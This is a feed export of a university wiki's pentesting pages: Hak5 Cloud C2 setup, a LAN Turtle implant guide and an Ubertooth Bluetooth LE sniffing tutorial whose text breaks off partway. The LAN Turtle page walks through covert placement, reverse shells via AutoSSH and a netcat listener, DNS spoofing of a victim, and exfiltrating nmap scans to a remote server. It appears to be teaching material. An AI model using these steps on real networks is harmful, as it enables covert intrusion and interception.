The [[Hak5 Cloud C2]] is a command and control server for Hak5 devices. Installation and startup is shown in figure &amp;quot;C2 server start&amp;quot;. By browsing to the configured address you can login to the dashboard, shown in figure &amp;quot;C2 dashboard&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
To connect the Packet Squirrel with your C2 Cloud, click on the plus button in the lower right corner and choose the device. On the dashboard, open the added device and click on Setup, as shown in figure &amp;quot;C2 Packet Sqirrel&amp;quot;. Then copy the downloaded file to the Packet Squirrel&#039;s /etc folder and reboot it. &lt;br /&gt;
In the Overview tab you can also Edit, Reboot, Wipe and Remove your device. &lt;br /&gt;
&lt;br /&gt;
In the Clients tab you can see all clients which were connected to your Packet Squirrel with hostname, MAC and IP address. In the Loot tab, you can open the current loot from your Packet Squirrel directly on your C2 server. And in the Terminal tab you can open a ssh session to your device.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360001177114-Cloud-C2&lt;br /&gt;
* https://downloads.hak5.org/&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6088</id>
		<title>Hak5 LAN Turtle</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6088"/>
		<updated>2021-03-05T15:29:39Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Added factory Reset and edited updating firmware.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:LANTurtle.jpg |thumb|right|400px||LAN Turtle and Field Guide]]&lt;br /&gt;
The LAN turtle is a tool for penetration testers and system administrators disguised as a simple USB Ethernet adapter. It provides possibilities to perform remote access, man-in-the-middle and information gathering attacks. These functions are provided by the turtle modules which are preinstalled on the LAN turtle. The modules are based on the OpenWRT platform which allow users to add customized modules. The turtle itself is covert by a generic USB to Ethernet adapter and can therefore be placed unnoticed in IT infrastructures.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Setting up the LAN Turtle ===&lt;br /&gt;
&lt;br /&gt;
# Plug the LAN turtle into one of the USB ports of your computer.&lt;br /&gt;
# Your computer will get an 172.16.84.x address as soon as the startup sequence of the turtle finished. If not, then you have to statically configure an IP out of the 172.16.84.0/24 range.&lt;br /&gt;
# Connect to the turtle with &amp;lt;code&amp;gt;ssh root@172.16.84.1&amp;lt;/code&amp;gt; and enter the password &amp;lt;code&amp;gt;sh3llz&amp;lt;/code&amp;gt;&lt;br /&gt;
# The simplistic graphical shell interface will prompt you to change the password but the old one is also allowed.&lt;br /&gt;
# Then the LAN turtle can be configured and modules can be installed within the interface. &lt;br /&gt;
# If you end the interface you will be greeted with an normal Linux shell but you can open it again with the &amp;lt;code&amp;gt;turtle&amp;lt;/code&amp;gt; command&lt;br /&gt;
&lt;br /&gt;
=== Updating firmware (optional) ===&lt;br /&gt;
To ensure the best performance and compatability you should update the firmware regularly. This requires an internet conneciton.&lt;br /&gt;
&lt;br /&gt;
# Select &amp;lt;code&amp;gt;Config&amp;lt;/code&amp;gt; in the Main Menu and press select.&lt;br /&gt;
# Go to &amp;lt;code&amp;gt;Check for updates&amp;lt;/code&amp;gt; and press select to start the update process.&lt;br /&gt;
# Wait till the update finishes.&lt;br /&gt;
&lt;br /&gt;
=== Factory Reset (optional)===&lt;br /&gt;
In the extreme case that a LAN Turtle has become permanently inaccessible or inoperative, there is a quick method for recovery using a special web interface.&lt;br /&gt;
# Download the latest LAN Turtle factory image from the [https://downloads.hak5.org/ official download center]. Note: Choose the factory recovery image.&lt;br /&gt;
# Open the LAN Turtle carefully. There are 2 screws under the sticker.&lt;br /&gt;
# Now you need to find the reset button/jumper contact. You can find a video on how to locate [https://www.youtube.com/watch?v=ubNin_79wxE here].&lt;br /&gt;
# Hold down the button/jumper while you&#039;re plugging the LAN Turtle in your PC and keep holding it for 5 more seconds.&lt;br /&gt;
# Go to http://192.168.1.1 for the firmware web recovery tool and upload the image to the LAN Turtle.&lt;br /&gt;
# Wait 5-10 minutes for the recovery to finish, the LAN Turtle will indicate it with a special LED blink pattern. Watch the video for the LED Pattern to know when the recovery has finished.&lt;br /&gt;
&lt;br /&gt;
=== Using the turtle modules ===&lt;br /&gt;
&lt;br /&gt;
The LAN turtle comes packed with pre-installed tools. Furthermore it is possible to program your own or download them from the internet and configure them with the module manager as well.&lt;br /&gt;
&lt;br /&gt;
[[File:LANTurtleModules.jpg|400px||LAN Turtle configuration shell interface]]&lt;br /&gt;
&lt;br /&gt;
==== Manually download turtle modules ====&lt;br /&gt;
If the module manager doesn&#039;t work you need to manually download turtle modules. You can do that in the console of the lan turtle, just exit the main menu.&lt;br /&gt;
You can download modules from the [https://github.com/hak5/lanturtle-modules/tree/gh-pages/modules official hak5 github].&lt;br /&gt;
&lt;br /&gt;
# Change directory to &amp;lt;code&amp;gt;/etc/turtle/modules&amp;lt;/code&amp;gt;&lt;br /&gt;
# Download modules with &amp;lt;code&amp;gt;wget &amp;lt;link&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
# Make the file an executeable &amp;lt;code&amp;gt;chmod +x &amp;lt;file&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== AutoSSH ====&lt;br /&gt;
&lt;br /&gt;
AutoSSH is a service which provides persistent SSH connections. If an SSH session drops, it will be quickly re-established by AutoSSH. This service is typically used to provide a convenient and persistent reverse shell into the LAN Turtle on the standard SSH port 22 - though it may be configured with any standard SSH parameters to forward any arbitrary port.&lt;br /&gt;
*&amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; - The username and hostname (DNS or IP) separated by @ for which to establish the SSH connection.&lt;br /&gt;
*&amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; - The port number from which the remote server will bind.&lt;br /&gt;
*&amp;lt;code&amp;gt;listen port&amp;lt;/code&amp;gt; - The port number to which the remote port will bind.&lt;br /&gt;
&lt;br /&gt;
Example: Per the defaults, the remote server will bind its local port 2222 back to the LAN Turtle port 22. In this scenario one may establish a persistent connection to their LAN Turtle from this reverse shell by first connecting to the public server, and then from there establishing an SSH connection to port 2222.&lt;br /&gt;
&lt;br /&gt;
==== Cron ====&lt;br /&gt;
Cron is a job scheduler which can be used to start and stop modules at specific times or regular intervals using the &#039;start&#039; and &#039;stop&#039; commands.&lt;br /&gt;
&lt;br /&gt;
==== DNSSpoof ====&lt;br /&gt;
DNSSpoof forges replies to arbitrary DNS address / pointer queries on the LAN. This is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks. For example, the IP address returned for a client lookup of the domain \&amp;quot;example.com\&amp;quot; can be replaced with that of the LAN Turtle itself, or a 3rd party server. In this scenario, the computer connected to the Internet through the LAN Turtle attempting to browse to this domain may be redirected to the spoofed IP.&lt;br /&gt;
&lt;br /&gt;
==== Keymanager ====&lt;br /&gt;
With this tool you can create RSA keypairs and copy them to the public server. This is needed when AutoSSH is configured.&lt;br /&gt;
&lt;br /&gt;
==== Meterpreter ====&lt;br /&gt;
This module deploys an persistent shell to the Metasploit Framework of an other Machine.&lt;br /&gt;
&lt;br /&gt;
==== Nmap-Scan ====&lt;br /&gt;
This module uses &amp;lt;code&amp;gt;nmap&amp;lt;/code&amp;gt; for discovering running devices and their port of the current LAN network.&lt;br /&gt;
&lt;br /&gt;
==== OpenVPN ====&lt;br /&gt;
OpenVPN enables remote access the LAN Turtle and optionally the network on which it resides. It allows to send the captured data to your operating network.&lt;br /&gt;
&lt;br /&gt;
==== SSHFS====&lt;br /&gt;
SSHFS (Secure SHell FileSystem) is a file system for Linux (and other operating systems with a FUSE implementation, such as Mac OS X or FreeBSD) capable of operating on files on a remote computer using just a secure shell login on the remote computer. On the local computer where the SSHFS is mounted, the implementation makes use of the FUSE (Filesystem in Userspace) kernel module. The practical effect of this is that the end user can seamlessly interact with remote files being securely served over SSH just as if they were local files on his/her computer. On the remote computer the SFTP subsystem of SSH is used.&lt;br /&gt;
&lt;br /&gt;
==== URLSnarf ====&lt;br /&gt;
URLSnarf allows you to capture which websites were accessed by the plugged in computer. URLSnarf only works with HTTP webpages which are hard to find today.&lt;br /&gt;
&lt;br /&gt;
==== NetCat Reverse Shell ====&lt;br /&gt;
The netcat reverse shell provides you with remote access to the lan turtle and thus persistent access to the network.&lt;br /&gt;
&lt;br /&gt;
== Use Cases==&lt;br /&gt;
&lt;br /&gt;
The LAN turtle can be deployed in various use cases, which can be divided into three categories:&lt;br /&gt;
* remote access attacks with AutoSSH or OpenVPN or NetCat Reverse Shell&lt;br /&gt;
* man-in-the-middle attacks with URLSnarf or DNSSpoof&lt;br /&gt;
* information gathering with Nmap-Scan&lt;br /&gt;
&lt;br /&gt;
Remote access attacks are used to gain access to a private network from a remote place in order to start further attacks from the inside network. This makes it a lot more easier because the attack itself does not have to bypass a router or firewall. All the attacker needs is the pre-configured LAN turtle inside the network and a remote server on the internet. To perform a remote access, the LAN turtle builds up a tunnel to the remote server so the firewall cannot capture the traffic. Finally the attacker can access the LAN turtle through the tunnel from the remote server. This attack can be performed with the modules AutoSSH or OpenVPN.&lt;br /&gt;
&lt;br /&gt;
The LAN turtle also allows man-in-the-middle attacks, where the turtle can intercept the communication between two parties. To perform such an attack, the LAN turtle must be connected to an USB port of the victim host and to a network cable which connects the host to the internal LAN. Now the whole traffic of the victim host goes over the LAN turtle and can be logged or altered. An attacker can use URLSnarf or DNSSpoof to perform such an attack.&lt;br /&gt;
&lt;br /&gt;
The last use case is information gathering. The aim of this attack is to receive information about the topology, the hosts and the protocols of an internal network in order to perform further attacks. This can be done with the modules like Nmap-Scan.&lt;br /&gt;
&lt;br /&gt;
The following step-by-step instructions will outline how to configure the LAN turtle in order to perform the different types of attacks.&lt;br /&gt;
&lt;br /&gt;
=== Remote access attacks with AutoSSH ===&lt;br /&gt;
In this example consider an internal network which is secured by a firewall and a public server in the internet controlled by the attacker.&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Generate RSA keypairs with Keymanager ====&lt;br /&gt;
# Open the Keymanager module and select &amp;lt;code&amp;gt;generate_key&amp;lt;/code&amp;gt;&lt;br /&gt;
# Select &amp;lt;code&amp;gt;copy_key&amp;lt;/code&amp;gt; and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; remote SSH server port (typically 22)&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; user on the remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;password&amp;lt;/code&amp;gt; password for the user on the remote host&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Configure AutoSSH ====&lt;br /&gt;
# Open AutoSSH and insert the following parameters:&lt;br /&gt;
#* &amp;lt;code&amp;gt;user@host&amp;lt;/code&amp;gt; user and host to establish the SSH tunnel&lt;br /&gt;
#* &amp;lt;code&amp;gt;remote port&amp;lt;/code&amp;gt; remote port to bind through the SSH tunnel (default 2222)&lt;br /&gt;
#* &amp;lt;code&amp;gt;local port&amp;lt;/code&amp;gt; local port to bind tunnel (default 22)&lt;br /&gt;
# Submit the changes and start AutoSSH (or enable it for autostart)&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Access LAN turtle from remote server ====&lt;br /&gt;
# Connect to the remote server&lt;br /&gt;
# Connect locally to the remote port of the AutoSSH configuration by &amp;lt;code&amp;gt;ssh root@localhost:2222&amp;lt;/code&amp;gt;&lt;br /&gt;
# You are now on the LAN turtle, continue with further attacks&lt;br /&gt;
&lt;br /&gt;
=== Remote access attacks with NetCat Reverse Shell ===&lt;br /&gt;
==== Step 1: Start NetCat server on your host machine ====&lt;br /&gt;
# To start NetCat server execute &amp;lt;code&amp;gt;nc -lvp 4444&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Configure NetCat Reverse Shell ====&lt;br /&gt;
# Open the NetCat Rever Shell module and go to &amp;quot;Configure&amp;quot;&lt;br /&gt;
# Enter your host machines ip address and the port of the nc server. In our case 4444.&lt;br /&gt;
&lt;br /&gt;
==== Step 3: Exploit ====&lt;br /&gt;
When the reverse shell connected to your host machine you can execute commands on the lan turtle.&lt;br /&gt;
&lt;br /&gt;
=== Man-in-the-middle attacks with DNSSpoof ===&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure the spoofhost file ====&lt;br /&gt;
# Open the DNSSpoof module and go to &amp;quot;Configure&amp;quot;&lt;br /&gt;
# Add the DNS entries that the LAN turtle should spoof by entering the IP address and the spoofed DNS name&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Place the LAN turtle in the network ====&lt;br /&gt;
After configuring the spoofed hosts, place the LAN turtle on the victim computer by simply plugging the turtle into an USB port of the computer and the network cable into the LAN turtle.&lt;br /&gt;
&lt;br /&gt;
=== Information Gathering with nmap ===&lt;br /&gt;
As an example project we use the following modules:&lt;br /&gt;
* Cron to periodically start the attack&lt;br /&gt;
* SSHFS to save the caputred information in a file on the remote server&lt;br /&gt;
* Nmap-Scan to sniff the configuration and devices of the network&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure SSHFS ====&lt;br /&gt;
# Access the SSHFS module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; IP address of the remote server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; 22&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; the username&lt;br /&gt;
#* &amp;lt;code&amp;gt;path&amp;lt;/code&amp;gt; This can be left blank if you want to use the users home directory&lt;br /&gt;
# Start SSHFS and enable it for start up&lt;br /&gt;
&lt;br /&gt;
==== Step 2: nmap-scan ====&lt;br /&gt;
# Access the nmap-scan module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* target: &amp;lt;code&amp;gt;192.168.0.1-255&amp;lt;/code&amp;gt; (This may differ for our network)&lt;br /&gt;
#* logflie: &amp;lt;code&amp;gt;/sshfs/&amp;lt;/code&amp;gt;&lt;br /&gt;
#* use the desired attack profile&lt;br /&gt;
#* save the configuration with execute&lt;br /&gt;
&lt;br /&gt;
==== Step 3: cron job ====&lt;br /&gt;
# add in the con config &amp;lt;code&amp;gt;*/15 * * * * start nmap-scan&amp;lt;/code&amp;gt;&lt;br /&gt;
This line start an nmap-scan every 15 minutes.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[LAN Turtle]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000979313-LAN-Turtle&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Bluetooth_Sniffing_with_Ubertooth:_A_Step-by-step_guide&amp;diff=6087</id>
		<title>Bluetooth Sniffing with Ubertooth: A Step-by-step guide</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Bluetooth_Sniffing_with_Ubertooth:_A_Step-by-step_guide&amp;diff=6087"/>
		<updated>2021-03-05T14:38:47Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Gatttool */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This is a tutorial on how to sniff Bluetooth Low Energy (BLE) packets using the [[Ubertooth One, 2.4 GHz wireless development platform]] device.&lt;br /&gt;
This guide will detail the setup process and outline every step to capture a BLE connection. Furthermore, it will provide methods of bluetooth hacking, i.e cracking the encryption of a BLE connection and overwriting characteristics of a device.&lt;br /&gt;
This tutorial is created in regard to the seminar paper: [[File:Pentesting in IoT Bluetooth Sniffing.pdf]]&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Linux-based Operating system: this test used [https://www.kali.org/downloads/ Kali Linux 64-Bit v2019.4 native install]&lt;br /&gt;
* BLE devices &lt;br /&gt;
* Tools: crackle, gatttool&lt;br /&gt;
&lt;br /&gt;
== BLE Fundamentals ==&lt;br /&gt;
&lt;br /&gt;
Fundamentals of the BLE Standard can be found at the [[BLE Fundamentals]] documentation.&lt;br /&gt;
&lt;br /&gt;
== Capturing BLE packets ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1 - Prerequisites  ===&lt;br /&gt;
&lt;br /&gt;
Ubertooth One offers a well-documented GitHub-repository [https://github.com/greatscottgadgets/ubertooth/wiki]. Follwowing its instructions, the device&#039;s tools require several components. To fulfill the demands, one has to install:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo apt-get install cmake libusb-1.0-0-dev make gcc g++ libbluetooth-dev pkg-config python3-numpy python3-qtpy&amp;lt;/code&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
In contrast to the guide, the &#039;&#039;python-pyside&#039;&#039; component needs to be installed separately using the &#039;&#039;pip-installer&#039;&#039;: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;pip install pyside3&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In order to for Ubertooth tools to decode Bluetooth packets the Bluetooth baseband library (&#039;&#039;libbtbb&#039;&#039;) needs to be downloaded and installed:&lt;br /&gt;
&lt;br /&gt;
 wget &amp;lt;nowiki&amp;gt;https://github.com/greatscottgadgets/libbtbb/archive/2018-12-R1.tar.gz -O libbtbb-2018-12-R1.tar.gz&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 tar -xf libbtbb-2018-12-R1.tar.gz&lt;br /&gt;
 cd libbtbb-2018-12-R1&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 cmake ..&lt;br /&gt;
 make&lt;br /&gt;
 sudo make install&lt;br /&gt;
 sudo ldconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Following that, the Ubertooth tools can be downloaded from the GitHub repository. They include host code, which enables sniffing Bluetooth packets. Additionally, they provide means to configure the Ubertooth device, including a simplified method for a firmware update.&lt;br /&gt;
&lt;br /&gt;
 wget &amp;lt;nowiki&amp;gt;https://github.com/greatscottgadgets/ubertooth/releases/download/2018-12-R1/ubertooth-2018-12-R1.tar.xz&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 tar xf ubertooth-2018-12-R1.tar.xz&lt;br /&gt;
 cd ubertooth-2018-12-R1/host&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 cmake ..&lt;br /&gt;
 make&lt;br /&gt;
 sudo make install&lt;br /&gt;
 sudo ldconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The Wireshark Bluetooth Baseband (&#039;&#039;BTBB&#039;&#039;) and Basic Rate/Enhanced Data Rate (&#039;&#039;BR/EDR&#039;&#039;) plugins facilitate the analysis of Bluetooth baseband traffic that has been captured within the Wireshark GUI. &lt;br /&gt;
The plugins need to be installed both separately from the &#039;&#039;libbtbb&#039;&#039; library. For the BTBB plugin the following commands have been used:&lt;br /&gt;
&lt;br /&gt;
 sudo apt-get install wireshark wireshark-dev libwireshark-dev cmake&lt;br /&gt;
 cd libbtbb-2018-12-R1/wireshark/plugins/btbb&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 cmake -DCMAKE_INSTALL_LIBDIR=/usr/lib/x86_64-linux-gnu/wireshark/libwireshark3/plugins ..&lt;br /&gt;
 make&lt;br /&gt;
 sudo make install&lt;br /&gt;
&lt;br /&gt;
It is important to state that the &#039;&#039;MAKE_INSTALL_LIBDIR&#039;&#039; directory can vary depending on the OS used and the wireshark installation. However, it should be the directory of existing Wireshark plugins.&lt;br /&gt;
The procedure needs to be repeated for the &#039;&#039;BR/EDR&#039;&#039; plugin.&lt;br /&gt;
&lt;br /&gt;
 cd libbtbb-2018-12-R1/wireshark/plugins/btbredr&lt;br /&gt;
 mkdir build&lt;br /&gt;
 cd build&lt;br /&gt;
 cmake -DCMAKE_INSTALL_LIBDIR=/usr/lib/x86_64-linux-gnu/wireshark/libwireshark3/plugins ..&lt;br /&gt;
 make&lt;br /&gt;
 sudo make install&lt;br /&gt;
&lt;br /&gt;
=== Step 2 - Verification &amp;amp; Firmware Update ===&lt;br /&gt;
&lt;br /&gt;
After installing the prerequisits, the Ubertooth One device was plugged in through a USB port. It is of utmost importance to operate the Ubertooth One with the antenna attached to it. Otherwise, there is a risk of damaging the device. After inserting the device, verify that the system detects it:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will display information about USB buses in the system and the devices connected to them:&lt;br /&gt;
&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 001 Device 005: ID 04f2:b595 Chicony Electronics Co., Camera&lt;br /&gt;
 Bus 001 Device 004: ID 138a:003f Validity Sensors, Inc. VFS495&lt;br /&gt;
 Bus 001 Device 003: ID 8087:0a2b Intel Corp.&lt;br /&gt;
 Bus 001 Device 002: ID 1ea7:0064 SHARKOON Technologies 2.4G Mouse&lt;br /&gt;
 Bus 001 Device 014: ID 1d50:6002 &#039;&#039;&#039;OpenMoko, Inc. Ubertooth One&#039;&#039;&#039;&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Upon first operation of the Ubertooth One it is necessary to update its firmware. The tools, which were downloaded before, facilitate a simplified way to achieve this task. Change the directory to the firmware directory of Ubertooth and execute the following command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-dfu -d bluetooth_rxtx.dfu -r&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If the update is successful, this output will be produced:&lt;br /&gt;
&lt;br /&gt;
 Switching to DFU mode...&lt;br /&gt;
 Checking firmware signature&lt;br /&gt;
 ........................................&lt;br /&gt;
 ........................................&lt;br /&gt;
 ........................................&lt;br /&gt;
 Detached&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To verify the firmware-version enter the following command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-util -v&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 3 - Ubertooth Spectrum Analyzer ===&lt;br /&gt;
&lt;br /&gt;
It is recommended to validate the functionality of the Ubertooth device via the spectrum analyzer, which is a tool to analyze the 2.4GHz band.&lt;br /&gt;
Specifically, it provides a Graphical User Interface (GUI) tool named ubertooth-specan-ui, which visually monitors the frequencies. This command will start the spectrum analyzer:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-specan-ui&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Once successful, you can see the analyzer work its task through a powerful GUI:&lt;br /&gt;
&lt;br /&gt;
[[File:Ubertooth Spectrum Analyzer.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In this case the figure shows several 802.11b networks in different channels, represented by green amplitudes.&lt;br /&gt;
The white amplitudes depict beacons that are visible during scanning. The red lines adjust to different centers of frequency channels in the 2.4GHz radio band.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 4 - Intercepting Lower Address Part (LAP) Packets ===&lt;br /&gt;
&lt;br /&gt;
The &#039;&#039;BD_ADDR&#039;&#039; makes the allocation of sniffed Bluetooth packets possible. The Ubertooth One can start the LAP scan with this command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-rx&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A continuous output will follow on the console:&lt;br /&gt;
&lt;br /&gt;
 systime=1578428685 ch=26 LAP=3a5138 err=1 clkn=8355 clk_offset=5199 s=-80 n=-55 snr=-25&lt;br /&gt;
 systime=1578428688 ch=26 LAP=3a5138 err=1 clkn=18479 clk_offset=5628 s=-81 n=-55 snr=-26&lt;br /&gt;
 systime=1578428692 ch=43 LAP=3a5138 err=2 clkn=28967 clk_offset=6029 s=-80 n=-55 snr=-25&lt;br /&gt;
 systime=1578428692 ch=47 LAP=3a5138 err=2 clkn=30327 clk_offset=6069 s=-81 n=-55 snr=-26&lt;br /&gt;
 systime=1578428694 ch=52 LAP=3a5138 err=1 clkn=36948 clk_offset=87 s=-79 n=-55 snr=-24&lt;br /&gt;
 systime=1578428696 ch=53 LAP=3a5138 err=0 clkn=42360 clk_offset=302 s=-77 n=-55 snr=-22&lt;br /&gt;
&lt;br /&gt;
In the output &#039;&#039;&#039;ch&#039;&#039;&#039; represents the channel used by the device referenced in the LAP value. &lt;br /&gt;
The channel hopping is clearly comprehensible. &#039;&#039;&#039;Clkn&#039;&#039;&#039; indicates the master`s clock, while &#039;&#039;&#039;s&#039;&#039;&#039; references the signal strength and &#039;&#039;&#039;n&#039;&#039;&#039; states the value of noise.&lt;br /&gt;
Following that the &#039;&#039;&#039;snr&#039;&#039;&#039; value represents the signal-to-noise ratio. &lt;br /&gt;
This mode is especially helpful for undiscoverable devices, because it can calculate a BD_ADDR through the LAP in combination with the other parameters.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Alternatively, if the devices are discoverable, you can use the BLE scan of hcitools:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo hcitool lescan&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Among eventual other devices you should see the BLE devices you are testing, in this case the thermostat and the fitness tracker:&lt;br /&gt;
 &lt;br /&gt;
 D5:AA:D0:41:A3:60 Mi Smart Band 4&lt;br /&gt;
 78:A5:04:62:71:3D TepHeatB&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 5 - The Ubertooth-BTLE Tool ===&lt;br /&gt;
&lt;br /&gt;
One of the most powerful tools the Ubertooth One provides is the Bluetooth Low Energy sniffing mode.&lt;br /&gt;
Among other things, it can sniff and follow connections and even interfere with them.&lt;br /&gt;
In the &amp;quot;follow&amp;quot; mode, Ubertooth listens on one of the three advertising channels.&lt;br /&gt;
Once a BLE connection is established (on the advertising channel the device has been listenting to), Ubertooth will follow the hops along the data channels capturing the transmissions between the devices.&lt;br /&gt;
Per default, Ubertooth can be used to follow any connection it observes randomly.&lt;br /&gt;
Naturally, the device can be restricted to observe a specific device by providing the &#039;&#039;BD_ADDR&#039;&#039; of the device in question.&lt;br /&gt;
The general syntax of the corresponding command for &amp;quot;follow&amp;quot; mode looks like:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-btle -f &amp;lt;nowiki&amp;gt;&amp;lt;BD_ADDR&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Simply replace the &#039;&#039;BD_ADDR&#039;&#039; with the address you found out earlier:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-btle -f 78:A5:04:62:71:3D&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This will produce a continuous output in the console.&lt;br /&gt;
&lt;br /&gt;
Furthermore, it is possible to redirect the output into a file or a pipe.&lt;br /&gt;
To achieve this, the syntax requires this generic command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-btle -f &amp;lt;nowiki&amp;gt;&amp;lt;BD_ADDR&amp;gt; -c &amp;lt;file or pipe&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 6 - Wireshark Analysis ===&lt;br /&gt;
&lt;br /&gt;
It is also possible to analyze the captured BLE packets in Wireshark. &lt;br /&gt;
For this purpose create a pipe via:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;mkfifo /tmp/pipe&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Following that, a new interface needs to be added to Wireshark in order to use the just created pipe.&lt;br /&gt;
&lt;br /&gt;
[[File:Wireshark manage interface.png|frameless|450px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
For this, the custom pipe &#039;&#039;/tmp/mypipe&#039;&#039; was added to the list of interfaces.&lt;br /&gt;
&lt;br /&gt;
[[File:Wireshark add pipe.png|frameless|450px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now repeat the command from Step 5, but now with a redirected ouput to the pipe:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ubertooth-btle -f 78:A5:04:62:71:3D -c /tmp/pipe&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Select the custom interface you have just created in Wireshark to be able to analyze packtets with enhanced visibility and additional information.&lt;br /&gt;
&lt;br /&gt;
[[File:Wireshark Thermo ConnectReq.png|frameless|1000px]]&lt;br /&gt;
&lt;br /&gt;
